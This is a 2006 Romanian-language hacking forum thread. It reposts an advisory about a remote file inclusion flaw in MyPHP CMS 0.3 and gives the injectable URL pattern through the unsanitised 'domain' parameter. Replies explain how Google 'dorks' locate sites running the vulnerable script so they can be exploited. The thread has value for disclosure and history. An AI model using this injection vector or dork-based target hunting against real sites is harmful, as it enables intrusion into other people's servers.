ghici Posted July 5, 2006 Report Posted July 5, 2006 mo pus kw3rln sa pun vurnerabilitatea asta publica ca si asa nu sunt siteuri http://www.xss-watch.org/teamwork/exploits...myphp%20cms.txto sa fie publica pe milw0rm curand --------------------------------------------------------------------------- MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : MyPHP CMSversion : latest version [ 0.3 ]URL : http://sourceforge.net/projects/myphpcms------------------------------------------------------------------Exploit:~~~~~~~~Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# /styles/default/global_header.php?domain=[Evil_Script]]http://www.site.com/[path]/styles/default/...n=[Evil_Script] ---------------------------------------------------------------------------Solution :~~~~~~~~~~declare variabel $domain---------------------------------------------------------------------------Shoutz:~~~~~~# Special greetz to my good friend [Oo]# To all members of h4cky0u.org and RST [ hTTp://RoSecurityGroup.net ]---------------------------------------------------------------------------*/Contact:~~~~~~~~Nick: Kw3rLnE-mail: ciriboflacs[at]YaHoo[dot]ComHomepage: hTTp://RoSecurityGroup.net/*-------------------------------- [ EOF] ---------------------------------- Quote
PsYKid Posted July 5, 2006 Report Posted July 5, 2006 d0rk: cuvinte cheie pe care google le foloseste ,atunci cand le introduci tu, pentru a gasi site`uri care au instalat scriptul respectiv, pentru a`l putea exploata in cazul de fata. Quote
nos Posted July 5, 2006 Report Posted July 5, 2006 el intreba cum ce dork tre sa pui pe google ma Quote
